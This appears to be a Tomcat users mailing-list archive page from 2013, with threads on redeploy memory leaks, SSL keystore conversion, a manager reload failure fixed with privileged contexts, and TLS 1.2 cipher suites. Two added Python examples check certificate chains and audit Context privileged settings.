confusing. 
Warm Regards, Jordan Michaels

On 11/06/2013 09:34 AM, Crystal Maramba wrote:

Tomcat version: 7.0.42
Operating System: Server 2008 x64 (Standard)

Question: I have two Tomcat File Directories:
1) Windows service installer location: \Program Files\Apache Software Foundation\Tomcat 7.0
2) Base distribution location: \Program Files\Apache\Tomcat 7.0 (this did not include the windows service wrapper)

Item 1) was installed after the 2) base distribution location was already configured but we needed to use the 1) windows service installer. Can I combine the files (.bat scripts) from the bin folders so that all the files with the bin folder in location 2) is in location 1)? Will there be an issue to do this?
RE: Fix your web application so it can cleanly un-deploy and re-deploy - how?
Springs over-use of CGLib for Interfaces is a memory consumer Retask CGLib Proxy to JDKProxy to create your Impl classes for @Before advised methods proxyTargetClass: false Similarly using JavaAssist with Hibernate reduced memory footprint over CGLib significantly http://docs.spring.io/spring/docs/3.0.0.M4/reference/html/ch08s05.html http://what-when-how.com/Tutorial/SpringFramework3/SpringFramework300224.html Dale: How did Mattias Jiderhamn's library help? Martin Subject: Fix your web application so it can cleanly un-deploy and re-deploy - how? Date: Thu, 7 Nov 2013 11:50:03 +1300 From: dale_ogil...@trimble.com To: users@tomcat.apache.org Chris made the following good suggestion in another thread: Can I make a suggestion? Fix your web application so it can cleanly un-deploy and re-deploy and then simply do a hot deployment? I've been down this track with our own Spring web apps and found it to be quite a deep rabbit hole where a number of 3rd party libs are used. We get the issue where the webapp classloader is not GC'ed due to classes in the libraries we use not being terminated cleanly. Which means we get a big permgen memory leak when we redeploy the app. The occasional tomcat restart workaround is effective, if nasty. I did what Chris suggested for one of our apps and I think I got to 3rd party library problem number FIVE (an oracle jdbc driver connection timer) before I gave up in disgust. As I recall undisposed thread locals were a common theme. I used various strategies to resolve the prior issues in things as simple as logging frameworks, JMS queuing libraries, underlying http client code etc. Strategies such as: 1. Specifically calling a low level library finalization routine in a context listener or Spring lifecycle bean 2. Updating the 3rd party library to a later version which fixed the leak 3. 
Including Mattias Jiderhamn's active leak prevention library

I would so love it if Tomcat could just throw away the entire webapp memory footprint on undeploy... Tomcat 7x memory leak protection wasn't good enough for our app a few months ago. Or failing that, if anyone can share successful strategies for Fixing your web application so it can cleanly un-deploy and re-deploy please do.

Dale

Ref: http://wiki.apache.org/tomcat/MemoryLeakProtection
Ref: https://github.com/mjiderhamn/classloader-leak-prevention

-Original Message-
From: Christopher Schultz [mailto:ch...@christopherschultz.net]
Sent: Thursday, 7 November 2013 10:44 a.m.
To: Tomcat Users List
Subject: Re: how to bounce tomcat remote?

snip
Can I make a suggestion? Fix your web application so it can cleanly un-deploy and re-deploy and then simply do a hot deployment?
snip
RE: Secure Tomcat With SSL
For over a year I've been looking for a tool to show the RFC 822 name and the PEM Thanks craig! Martin Date: Mon, 28 Oct 2013 16:43:53 -0400 Subject: Re: Secure Tomcat With SSL From: craig.tay...@drivedominion.com To: users@tomcat.apache.org This tool has saved me a few times over: http://sourceforge.net/projects/portecle/ On Mon, Oct 28, 2013 at 4:41 PM, Ognjen Blagojevic ognjen.d.blagoje...@gmail.com wrote: Chris, Leo, On 28.10.2013 18:23, Leo Donahue - OETX wrote: I've been having some trouble lately converting keys and certs from OpenSSL format into Java's JKS format. I follow all of the magical incantations I can find online to convert key+cert into a Java keystore but I get no love. Is there a decent guide anywhere for how to do this? From my book of spells. Used this to configure SSL in Apache httpd for subversion edge. openssl pkcs12 -export -in C:/server.crt -inkey C:/server.key -name svnedge -out C:/server.p12 keytool -importkeystore -srckeystore C:/server.p12 -srcstoretype PKCS12 -destkeystore C:/svnedge.jks During TLS handshake, server may respond with complete certificate chain (server certificate with all intermediate certificates) or with incomplete certificate chain (e.g. server certificate, without any/some intermediate certificates). Most servers, around 88% of them, deliver full certificate chain, according to research mentioned here [1]. Complete certificate chain is being recognized as valid by every client that implements TLS (assuming that root CA certificate is in the client keystore). Incomplete certificate chain may be recognized as valid by some TLS clients (e.g. Internet Explorer), using information from X.509v3 extension called Authority Information Access (AIA), or using previously validated certificate chains. Some clients will not recognize incomplete certificate chain as valid (e.g. openssl or Apache HTTPCommons Client). 
Even the same client may sometimes recognize incomplete certificate chains as valid and sometimes as invalid, thanks to caching of intermediate certificates. Therefore, it is best practice always to deliver complete certificate chain to the client. Having root CA certificate in the chain is unnecessary, as it wastes your bandwidth during TLS handshake (your client already has root CA certificate in its own keystore).

Assuming that intermediate certificates (intermediates.pem), server certificate (server.pem) and private key (server.key) are all in PEM format, you need to add option -certfile to command Leo provided:

openssl pkcs12 -export -out keystore.p12 -name myserver -in server.pem -inkey server.key -certfile intermediates.pem

Verify the contents of the p12 keystore with:

openssl pkcs12 -in keystore.p12 -nokeys

You should verify that the certificate chain is complete (up to, but without root CA certificate). Now, you may use that keystore for BIO and NIO connectors:

keystoreFile="keystore.p12"
keyAlias="myserver"
keystoreType="pkcs12"

Or you may convert it to JKS keystore as Leo suggests.

-Ognjen

[1] https://bugzilla.mozilla.org/show_bug.cgi?id=399324#c72
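The chain rule described in the message above (server certificate first, every intermediate present, root CA left out) can be checked mechanically. The following is an added example, not code from the thread or from Tomcat: it compares issuer and subject names only and does not verify signatures, and the helper names and the unsigned certificate skeletons used as input are constructed for illustration.

```python
import base64
import re

PEM_RE = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)


def read_tlv(buf, pos):
    """Parse one DER element at pos; return (tag, value_start, value_end)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:                                  # long-form length
        count = first & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    else:
        length = first
    return tag, pos, pos + length


def issuer_and_subject(cert_der):
    """Return the raw DER Name encodings (issuer, subject) of one certificate."""
    _, pos, _ = read_tlv(cert_der, 0)                 # Certificate SEQUENCE
    _, pos, end = read_tlv(cert_der, pos)             # TBSCertificate SEQUENCE
    fields = []
    while pos < end:
        tag, _, value_end = read_tlv(cert_der, pos)
        fields.append((tag, cert_der[pos:value_end]))
        pos = value_end
    if fields[0][0] == 0xA0:                          # optional explicit [0] version
        fields.pop(0)
    # Remaining order: serial, signature alg, issuer, validity, subject, ...
    return fields[2][1], fields[4][1]


def check_chain(pem_bundle, root_names):
    """Check a leaf-first PEM bundle; return a list of (index, code) problems.

    root_names: raw DER Names of the root CAs the client already trusts.
    Only names are compared; signatures are not verified.
    """
    names = [issuer_and_subject(base64.b64decode("".join(body.split())))
             for body in PEM_RE.findall(pem_bundle)]
    if not names:
        return [(0, "EMPTY")]
    problems = []
    for i, (issuer, subject) in enumerate(names):
        if issuer == subject:
            problems.append((i, "ROOT_INCLUDED"))     # unnecessary handshake bytes
        elif i + 1 < len(names):
            if names[i + 1][1] != issuer:
                problems.append((i, "OUT_OF_ORDER"))  # next cert did not issue this one
        elif issuer not in root_names:
            problems.append((i, "INCOMPLETE"))        # an intermediate is missing
    return problems


# --- constructed fixtures: minimal unsigned DER skeletons, not real certificates ---
def der(tag, *parts):
    body = b"".join(parts)
    n = len(body)
    if n < 0x80:
        head = bytes([n])
    else:
        raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
        head = bytes([0x80 | len(raw)]) + raw
    return bytes([tag]) + head + body


def name(cn):
    oid_cn = der(0x06, b"\x55\x04\x03")               # 2.5.4.3 commonName
    return der(0x30, der(0x31, der(0x30, oid_cn, der(0x0C, cn.encode()))))


def fake_cert(subject_cn, issuer_cn):
    """Build a PEM-wrapped certificate skeleton carrying only the two names."""
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")), der(0x02, b"\x01"), der(0x30),
              name(issuer_cn), der(0x30), name(subject_cn), der(0x30))
    cert = der(0x30, tbs, der(0x30), der(0x03, b"\x00"))
    return ("-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(cert).decode()
            + "-----END CERTIFICATE-----\n")


LEAF = fake_cert("www.example.test", "Constructed Intermediate CA")
INTERMEDIATE = fake_cert("Constructed Intermediate CA", "Constructed Root CA")
ROOT = fake_cert("Constructed Root CA", "Constructed Root CA")
TRUSTED_ROOTS = {name("Constructed Root CA")}

if __name__ == "__main__":
    for label, bundle in [("complete", LEAF + INTERMEDIATE), ("leaf only", LEAF),
                          ("root included", LEAF + INTERMEDIATE + ROOT)]:
        print(label, check_chain(bundle, TRUSTED_ROOTS))
```

On a real deployment the bundle would be the certificate output of the `openssl pkcs12 -in keystore.p12 -nokeys` command quoted above, and `root_names` would come from the client trust store.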
RE: possible tomcat 7.0.47 jsr-356 bug: NULL pointer being thrown when DecodeException is caught in PojoMessageHandlerWholeBaseT.onMessage
Morning Bob- session should never be null..this is a bug create an account here https://issues.apache.org/bugzilla/createaccount.cgi and file the bug report Many thanks for discovering this bug and helping us to improve the product Martin __ From: bob.dere...@thingworx.com To: users@tomcat.apache.org Subject: possible tomcat 7.0.47 jsr-356 bug: NULL pointer being thrown when DecodeException is caught in PojoMessageHandlerWholeBaseT.onMessage Date: Sat, 19 Oct 2013 12:46:05 + I am testing what happens when Encode/Decode Exceptions occur during JSR-356 communication and found that in the following code in onMessage, the ((WsSession)session) is NULL. As a result, the actual DecodeException (cause) is lost. // Can this message be decoded? Object payload; try { payload = decode(message); } catch (DecodeException de) { ((WsSession) session).getLocal().onError(session, de); return; } Tracing this further up the stack, I found that Util.getMessageHandlers is initializing it and passing NULL in for the session: if (decoderMatch.getTextDecoders().size() 0) { MessageHandlerResult result = new MessageHandlerResult( new PojoMessageHandlerWholeText(listener, m, null, endpointConfig, decoderMatch.getTextDecoders(), new Object[1], 0, false, -1, -1), MessageHandlerResultType.TEXT); results.add(result); } Is this a bug, or do I need to do something else to get this internal session initialize - in addition to calling: addMessageHandler(this) in the onOpen of my Endpoint-derived class? Thanks, Bob DeRemer Senior Director, Architecture and Development http://www.thingworx.com Skype: bob.deremer.thingworx O: 610.594.6200 x812 M: 717.881.3986
RE: can't connect to manager application
Date: Sat, 19 Oct 2013 10:23:11 +0200 From: edoa...@aspix.it To: users@tomcat.apache.org Subject: Re: can't connect to manager application Il 19/10/13 00:24, Mark Eggers ha scritto: On 10/18/2013 3:18 PM, André Warnier wrote: Edoardo Panfili wrote: Il 17/10/13 18:45, Edoardo Panfili ha scritto: My Tomcat (7.0.42) is listening on port 7080 and I have this conf/tomcat-users.xml in (production server) --- tomcat-users role rolename=manager-script/ user username=myname password=pwd roles=manager-script,manager-gui,manager-jmx/ /tomcat-users -- if I use curl -u myname:pwd http://localhost:7080/manager/text/reload?path=/myApplication the response is-- h1404 Not found/h1 p The page you tried to access (/manager/text/reload) does not exist. /p p The Manager application has been re-structured for Tomcat 7 onwards and some of URLs have changed. All URLs used to access the Manager application should now start with one of the following options: /p ul li/manager/html for the HTML GUI/li li/manager/text for the text interface/li li/manager/jmxproxy for the JMX proxy/li li/manager/status for the status pages/li /ul p Note that the URL for the text interface has changed from quot;/managerquot; to quot;/manager/textquot;. /p p You probably need to adjust the URL you are using to access the Manager application. However, there is always a chance you have found a bug in the Manager application. If you are sure you have found a bug, and that the bug has not already been reported, please report it to the Apache Tomcat team. 
/p - Installation step by step: Unpack new download from tomcat.apache.org 1- set users tomcat-users user username=edoardo password=pwd roles=manager-script,manager-gui,manager-jmx,other/ /tomcat-users then reload tomcat $curl -u edoardo:pwd http://localhost:8080/manager/text/reload?path=/examples OK - Reloaded application at context path /examples 2- copy myApplication from production server copy configuration file ($tomcat/Catalina/localhost/myApplication.xml) from production server stop start tomcat $curl -u edoardo:pwd http://localhost:8080/manager/text/reload?path=/myApplication OK - Reloaded application at context path /myApplication 3- first modify to server.xml shutdown tomcat modify server.xml Connector port=8080 protocol=HTTP/1.1 becomes Connector port=9080 protocol=HTTP/1.1 start then curl again all well 4- second modify to server.xml Host name=localhost appBase=webapps unpackWARs=true autoDeploy=true becomes Host name=localhost appBase=webapps unpackWARs=true autoDeploy=true deployXML=false stop-start $curl -u edoardo:pwd http://localhost:9080/manager/text/reload?path=/myApplication javax.servlet.ServletException: Error instantiating servlet class org.apache.catalina.manager.ManagerServlet [...] $curl -u edoardo:pwd http://localhost:9080/manager/text/reload?path=/myApplication the same error reported in the initial post (above) deployXML=false is recommended at http://tomcat.apache.org/tomcat-7.0-doc/config/host.html and useful for me. One big difference that I see when deployXML=false, is that this file : (catalina_base)/webapps/myApplication/META-INF/context.xml is no longer being parsed, and instead this file is parsed : $tomcat/Catalina/localhost/myApplication.xml when you reload your app. What is the content of that file ? From the last log file that was posted, these context files are pretty broken (although myApplication.xml only had the magic debug attribute set). 
- unpack tomcat - add an user in tomcat-users.xml - modify server.xml adding deployXML=false to Host Host name=localhost appBase=webapps unpackWARs=true autoDeploy=true deployXML=false - use manager application via curl $ curl -u user:pwd http://localhost:8080/manager/text/reload?path=/example error page. # cat manager.2013-10-19.log 19-ott-2013 10.16.17 org.apache.catalina.core.ApplicationContext log INFO: Marking servlet Manager as unavailable 19-ott-2013 10.16.17 org.apache.catalina.core.StandardWrapperValve invoke GRAVE: Allocate exception for servlet Manager java.lang.SecurityException: Restricted (ContainerServlet) class org.apache.catalina.manager.ManagerServlet at org.apache.catalina.core.DefaultInstanceManager.checkAccess(DefaultInstanceManager.java:538) at org.apache.catalina.core.DefaultInstanceManager.loadClassMaybePrivileged(DefaultInstanceManager.java:511) at org.apache.catalina.core.DefaultInstanceManager.newInstance(DefaultInstanceManager.java:137) at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1144) at org.apache.catalina.core.StandardWrapper.allocate(StandardWrapper.java:865) at
RE: can't connect to manager application
Date: Fri, 18 Oct 2013 18:04:19 +0200
From: edoa...@aspix.it
To: users@tomcat.apache.org
Subject: Re: can't connect to manager application

On 18/10/13 16:40, André Warnier wrote:
Edoardo Panfili wrote:
On 18/10/13 08:43, Ognjen Blagojevic wrote:
On 18.10.2013 7:34, Edoardo Panfili wrote:

To rule out faulty upgrade, could you try to reproduce the problem on clean Tomcat 7.0.42 install?

the problem was surely present with 7.0.39, the 7.0.42 is a fresh installation for me.

Could you please clarify: does the problem exist on 7.0.42, 7.0.39 or both?

both

Could you provide steps to reproduce the problem on fresh 7.0.42 installation?

- unpack tomcat
- modify listen port
- modify tomcat-users.xml
- copy jmxremote.access and jmxremote.password (setting permissions)
- build jsvc
- copy configuration files for applications (in $tomcat/conf/Catalina/localhost)

thank you for your question: also jmx remote access is not working (in both tomcat 7.0.39 and 7.0.42), maybe the two problems are related?

I tried to reproduce with the information you provided so far, but I was unable. It works for me.

Also on my local machine, where jmx is not configured.

Usually, a good place to look first, are the Tomcat logfiles. What do they say ?

searching for java.lang.SecurityException: Restricted (ContainerServlet) class org.apache.catalina.manager.ManagerServlet

MG> my HostManagerServlet is defined in webapps/host-manager/WEB-INF/web.xml as:

<servlet>
  <servlet-name>HostManager</servlet-name>
  <servlet-class>org.apache.catalina.manager.host.HostManagerServlet</servlet-class>
  <init-param>
    <param-name>debug</param-name>
    <param-value>2</param-value>
  </init-param>
</servlet>
<servlet>
  <servlet-name>HTMLHostManager</servlet-name>
  <servlet-class>org.apache.catalina.manager.host.HTMLHostManagerServlet</servlet-class>
  <init-param>
    <param-name>debug</param-name>
    <param-value>2</param-value>
  </init-param>
</servlet>
</MG>

seems that the solution is to add privileged=true

MG> my privileged attr in Context is located at /webapps/host-manager/META-INF/context.xml as:

<Context antiResourceLocking="false" privileged="true" />
</MG>

at $tomcat/conf/context.xml... and the reload command now works.

thank you
Edoardo

MG> many thanks Edoardo
MG> Martin
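The interaction discussed in this thread can be audited before a restart. With deployXML="false" the manager's own META-INF/context.xml (which carries privileged="true") is no longer read, so ManagerServlet is rejected as a restricted ContainerServlet; setting privileged="true" in conf/context.xml removes the error but applies to every web application on the server, whereas a per-application descriptor under conf/Catalina/localhost scopes it to the manager alone. The following is an added example, not code from the posters or from Tomcat; the precedence model, the ADMIN_APPS allow-list and the sample XML are assumptions constructed from the configuration quoted above.

```python
import xml.etree.ElementTree as ET

ADMIN_APPS = {"manager", "host-manager"}   # assumed allow-list of apps that need container servlets

# Constructed sample files modelled on the configuration quoted in the thread.
SERVER_XML = ('<Server><Service name="Catalina"><Engine name="Catalina" defaultHost="localhost">'
              '<Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true" '
              'deployXML="%s"/></Engine></Service></Server>')
GLOBAL_CTX_DEFAULT = "<Context><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>"
GLOBAL_CTX_PRIVILEGED = '<Context privileged="true"/>'
MANAGER_CTX = '<Context antiResourceLocking="false" privileged="true"/>'


def privileged_attr(context_xml):
    """Return True/False if the <Context> sets privileged, None if it is absent."""
    value = ET.fromstring(context_xml).get("privileged")
    return None if value is None else value.strip().lower() == "true"


def effective_privileged(app, deploy_xml, global_ctx, host_descriptors, embedded):
    """Resolve the privileged flag for one application.

    Assumed precedence: conf/context.xml supplies the default; a descriptor in
    conf/<Engine>/<Host>/<app>.xml overrides it; the embedded
    META-INF/context.xml is consulted only when deployXML is true and no
    host-level descriptor exists.
    """
    result = privileged_attr(global_ctx) or False
    if app in host_descriptors:
        source = host_descriptors[app]
    elif deploy_xml and embedded.get(app):
        source = embedded[app]
    else:
        source = None
    if source is not None:
        own = privileged_attr(source)
        if own is not None:
            result = own
    return result


def audit(server_xml, global_ctx, host_descriptors, embedded):
    """Report apps that are privileged without need, and admin apps left unprivileged.

    host_descriptors: {app: XML text of conf/Catalina/localhost/<app>.xml}
    embedded:         {app: XML text of webapps/<app>/META-INF/context.xml, or None}
    """
    host = ET.fromstring(server_xml).find(".//Host")
    # A missing attribute is treated as true (assumption: no security manager in use).
    deploy_xml = host.get("deployXML", "true").strip().lower() == "true"
    report = {"deployXML": deploy_xml, "over_privileged": [], "blocked_admin_apps": []}
    for app in sorted(set(embedded) | set(host_descriptors)):
        privileged = effective_privileged(app, deploy_xml, global_ctx,
                                          host_descriptors, embedded)
        if privileged and app not in ADMIN_APPS:
            report["over_privileged"].append(app)      # can load container servlets
        if not privileged and app in ADMIN_APPS:
            report["blocked_admin_apps"].append(app)   # expect "Restricted (ContainerServlet)"
    return report


if __name__ == "__main__":
    apps = {"manager": MANAGER_CTX, "myApplication": None}
    print("deployXML=false only:   ", audit(SERVER_XML % "false", GLOBAL_CTX_DEFAULT, {}, apps))
    print("global privileged=true: ", audit(SERVER_XML % "false", GLOBAL_CTX_PRIVILEGED, {}, apps))
    print("per-app manager.xml:    ", audit(SERVER_XML % "false", GLOBAL_CTX_DEFAULT,
                                            {"manager": MANAGER_CTX}, apps))
```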
RE: can't connect to manager application
source http://localhost:8080/manager/text/reload?path=/examples /source Signal an existing application to shut itself down and reload. This can be useful when the web application context IS NOT RELOADABLE and you have updated classes or property files in the code/WEB-INF/classes/code directory or when you have added or updated jar files in the code/WEB-INF/lib/code directory. Context reloadable attribute would need to reflect reloadable=false e.g. Context path=/petclinic reloadable=false Buona Fortuna, Martin __ Si prega di non alterare o interrompere questa trasmissione...Grazie Date: Thu, 17 Oct 2013 18:45:30 +0200 From: edoa...@aspix.it To: users@tomcat.apache.org Subject: can't connect to manager application My Tomcat (7.0.42) is listening on port 7080 and I have this conf/tomcat-users.xml in (production server) --- tomcat-users role rolename=manager-script/ user username=myname password=pwd roles=manager-script,manager-gui,manager-jmx/ /tomcat-users -- if I use curl -u myname:pwd http://localhost:7080/manager/text/reload?path=/myApplication the response is-- h1404 Not found/h1 p The page you tried to access (/manager/text/reload) does not exist. /p p The Manager application has been re-structured for Tomcat 7 onwards and some of URLs have changed. All URLs used to access the Manager application should now start with one of the following options: /p ul li/manager/html for the HTML GUI/li li/manager/text for the text interface/li li/manager/jmxproxy for the JMX proxy/li li/manager/status for the status pages/li /ul p Note that the URL for the text interface has changed from quot;/managerquot; to quot;/manager/textquot;. /p p You probably need to adjust the URL you are using to access the Manager application. However, there is always a chance you have found a bug in the Manager application. If you are sure you have found a bug, and that the bug has not already been reported, please report it to the Apache Tomcat team. 
/p - on my local machine all goes well (same tomcat version but on port 8080), can't figure what is different on production server... where can I take a look? Some release ago (tomcat 7.0.x sorry, I can't be more precise) all was well also on production server. Maybe i did something wrong during an update. thank you Edoardo - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: RSocket Error
MG> 1) the problem calling executeMethod will need to try{..} catch for IOException and HttpException

    /**
     * Executes the given {@link HttpMethod HTTP method}.
     *
     * @param method the {@link HttpMethod HTTP method} to execute.
     * @return the method's response code
     *
     * @throws IOException If an I/O (transport) error occurs. Some transport exceptions
     *                     can be recovered from.
     * @throws HttpException If a protocol exception occurs. Usually protocol exceptions
     *                     cannot be recovered from.
     */
    public int executeMethod(HttpMethod method)
        throws IOException, HttpException {

        LOG.trace("enter HttpClient.executeMethod(HttpMethod)");
        // execute this method and use its host configuration, if it has one
        return executeMethod(null, method, null);
    }

MG> 2) If you have a reliable HostConfiguration why not use that?
MG>

    /**
     * Executes the given {@link HttpMethod HTTP method} using the given custom
     * {@link HostConfiguration host configuration} with the given custom
     * {@link HttpState HTTP state}.
     *
     * @param hostconfig The {@link HostConfiguration host configuration} to use.
     * If <code>null</code>, the host configuration returned by {@link #getHostConfiguration} will be used.
     * @param method the {@link HttpMethod HTTP method} to execute.
     * @param state the {@link HttpState HTTP state} to use when executing the method.
     * If <code>null</code>, the state returned by {@link #getState} will be used.
     *
     * @return the method's response code
     *
     * @throws IOException If an I/O (transport) error occurs. Some transport exceptions
     *                     can be recovered from.
     * @throws HttpException If a protocol exception occurs. Usually protocol exceptions
     *                     cannot be recovered from.
     * @since 2.0
     */
    public int executeMethod(HostConfiguration hostconfig,
        final HttpMethod method, final HttpState state)
        throws IOException, HttpException {

The constructors are weak for HostConfiguration. You will need to build an empty HostConfiguration first, set the Hostname, port and protocol

    setHost(final String host, int port, final Protocol protocol)

then set the ProxyHost and the proxyPort

    setProxy(final String proxyHost, int proxyPort)

http://www.docjar.com/html/api/org/apache/commons/httpclient/HostConfiguration.java.html

finally on multi-homed or clustered configurations set the InetAddress

    /**
     * Set the local address to be used when creating connections.
     * If this is unset, the default address will be used.
     * This is useful for specifying the interface to use on multi-homed or clustered systems.
     *
     * @param localAddress the local address to use
     */
    public synchronized void setLocalAddress(InetAddress localAddress)

most people use static route to identify a gateway for a particular IP configuration
request the static route from your net-admin
http://www.nongnu.org/quagga/docs/docs-multi/Static-Route-Commands.html

it is also possible on linux to configure specific rules for multi-homed systems
details on which rule to use for multi-homed on linux the command on which ip rule you should also be obtained from net-admin

    ip rule list

https://blogs.oracle.com/networking/entry/advance_routing_for_multi_homed

the rule will point you to the IP you should use in InetAddress

Martin
__
Disclaimer and confidentiality note

This message is confidential. If you are not the intended recipient, we kindly ask you to notify us. Any unauthorized forwarding or making of a copy is prohibited. This message serves only for the exchange of information and has no legally binding effect. Because e-mails can easily be manipulated, we cannot accept any liability for the content.

This message is confidential and may be privileged. If you are not the intended recipient, we kindly ask that you inform the sender. Any unauthorized distribution or copying of this is prohibited. This message serves for information only and will not have any legally binding effect. Given that e-mails can easily be subject to manipulation, we cannot accept any responsibility for the content provided.

From: divya.prak...@mahindracomviva.com
To: users@tomcat.apache.org
RE: JspTagException- Stream closed
where is the iter attribute declaration for selection HTML tag? http://www.w3schools.com/tags/tag_select.asp Martin __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. From: tinu.b...@amd.com To: users@tomcat.apache.org Subject: RE: JspTagException- Stream closed Date: Thu, 5 Sep 2013 04:09:34 + Here is the body of the method doEndTag(). The exception is thrown for line number 146, which isthis.iter = null; of the reset method. public int doEndTag() throws JspException { if (this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent != null) { try { this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent.writeOut(this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent.getEnclosingWriter()); } catch (IOException localIOException) { this.jdField_pageContext_of_type_JavaxServletJspPageContext.getServletContext().log(Res.getString(4), localIOException); throw new JspTagException(localIOException.getMessage()); } } reset(); return 6; } private void reset() { this.sDataSource = null; this.changeCurrentRow = true; this.useRange = false; this.ds = null; this.rs = null; this.iter = null; } -Original Message- From: Babu, Tinu [mailto:tinu.b...@amd.com] Sent: Monday, August 26, 2013 2:51 PM To: Tomcat Users List Subject: RE: JspTagException- Stream closed The RowSetIterate tag is declared in the JSP itself. All the JSPs having this RowSetIterate tag is throwing Stream closed exception. 
-Original Message- From: Christopher Schultz [mailto:ch...@christopherschultz.net] Sent: Wednesday, August 21, 2013 9:41 PM To: Tomcat Users List Subject: Re: JspTagException- Stream closed -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Tinu, On 8/20/13 9:59 PM, Babu, Tinu wrote: Here is the piece of codes which is throwing the error. select name=list1 size=15 multiple jbo:RowsetIterate datasource=userRole option value=jbo:ShowValue datasource=userRole dataitem=RoleName / jbo:ShowValue datasource=userRole dataitem=RoleDesc / /option /jbo:RowsetIterate /select select name=list2 size=15 multiple jbo:RowsetIterate datasource=roles option value=jbo:ShowValue datasource=roles dataitem=RoleName / jbo:ShowValue datasource=roles dataitem=RoleDesc / /option /jbo:RowsetIterate /select Exception is always being thrown from the RowSetIterate Tags in JSPs. This was working properly with Tomcat4 version and when we upgraded our Tomcat to version 6 we started getting this strange exception. Please share your thoughts. Where is the row set itself declared? In the JSP? In a servlet somewhere that executes before the JSP? In general, I wouldn't recommend making any JDBC calls from within a JSP: I prefer to take care of all data acquisition in a servlet (or similar) before delegating the creation of a response to the view layer. But that's just me. 
-chris
RE: How to retrieve OCSP Information at server side(In Servlet) Tomact ver 7.0.40/Centos
Date: Tue, 3 Sep 2013 13:15:47 +0530 Subject: How to retrieve OCSP Information at server side(In Servlet) Tomact ver 7.0.40/Centos From: sushil.pru...@gmail.com To: users@tomcat.apache.org HI All I want to retrieve OCSP information at server side in servlet . So currently i am using X509Certificate certChain[] = (X509Certificate[]) request.getAttribute(javax.servlet.request.X509Certificate); MGassuming 'someone' was smart enough to place certificate name into javax.servlet.request.X509Certificate a-priori ans also i have configured below value at /conf/server.xml truststoreFile=/LocalDev/software/ssl/server/server.ks truststorePass=password and clientAuth=want Even though i am unable to retrieve value ,It's giving null. ANy idea is there any extra configuration i need to do at tomcat side? MGdifference between accessing truststore and accessing keystore http://stackoverflow.com/questions/318441/truststore-and-keystore-definitions
RE: Unable to start apache tomcat server
In other words ...this was an eclipse plugin misconfiguration? If so does eclipse have a support site for plugin misconfiguration(s)?

Martin Gainty

Date: Sun, 1 Sep 2013 00:27:09 +0530
Subject: Re: Unable to start apache tomcat server
From: sushil.pru...@gmail.com
To: users@tomcat.apache.org

Hi Brit/Marc

Thanks for your time. Problem got resolved using below url.
http://stackoverflow.com/questions/8520267/localhost8080-gives-404-the-requested-resource-is-not-available

On Sun, Sep 1, 2013 at 12:08 AM, Burghard W.V. Britzke b...@charmides.in-berlin.de wrote:

pardon! the word resource could be confusing - the better expression is web application which is mapped to / so the web application which is mapped to / is missing or is not configured.

On 31.08.2013 at 20:34, Burghard W.V. Britzke b...@charmides.in-berlin.de wrote:

but this means that tomcat is up and running (like Marc stated before). only the resource / is missing. what is the content of your webapps directory?

On 31.08.2013 at 20:03, Sushil Prusty sushil.pru...@gmail.com wrote:

Hi

I am very sorry i am using http://localhost:8080 not https://. I am getting below status when i am opening.

HTTP Status 404 - /
type Status report
message /
description The requested resource is not available.
Apache Tomcat/7.0.42

On Sat, Aug 31, 2013 at 11:27 PM, Caldarale, Charles R chuck.caldar...@unisys.com wrote:

From: Sushil Prusty [mailto:sushil.pru...@gmail.com]
Subject: Re: Unable to start apache tomcat server

I am using https://localhost:8080.

Use http, not https. If you want to use https, you will need to configure an additional Connector (usually on port 8443), including establishing a server certificate.

- Chuck

THIS COMMUNICATION MAY CONTAIN CONFIDENTIAL AND/OR OTHERWISE PROPRIETARY MATERIAL and is thus for use only by the intended recipient. If you received this in error, please contact the sender and delete the e-mail and its attachments from all computers.
RE: Tomcat 7 / Java 7 with TLS 1.2 algorithms
what's supposed to happen: The specified cipher in SSLCipherSuiteSSLCipherSuite is supposed to be enabled when specified within SSLCipherSuiteSSLCipherSuite=SHA256/384 to allow the Server to arbitrate the ordering of ciphers(instead of the client) SSLHonorCipherOrder=true http://tomcat.apache.org/tomcat-7.0-doc/config/http.html does this not work for you? Martin Gainty __ Please do not alter or disrupt this transmission..Thank You From: d...@sosnoski.com Subject: Tomcat 7 / Java 7 with TLS 1.2 algorithms To: users@tomcat.apache.org CC: Date: Thu, 22 Aug 2013 04:41:54 -0400 Tomcat 7.0.40 seems to work well with TLS 1.2, forced by using a sslEnabledProtocols=TLSv1.2 attribute on the Connector. But I haven't been able to make it work with any of the SHA256/384 algorithms - they always show up in the Ignoring unsupported cipher suite list. I get the same thing happening when I try to use them from client code, so I know it's not a Tomcat issue, but I'm hoping someone knows a workaround. Any suggestions? Thanks, - Dennis - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Tomcat 7 / Java 7 with TLS 1.2 algorithms
point of confusion

Eric Rescorla specifically cites SHA384 in his cipher examples for TLS 1.2 Update
http://www.ietf.org/rfc/rfc5246.txt
http://www.ietf.org/proceedings/70/slides/tls-0.pdf

Kuat Eshengazin used bltest as a test harness for SHA384

    bltest -R -m prf_sha384 -k tests/prf_sha384/key0 -t tests/prf_sha384/seed0 -h -g 148 -x

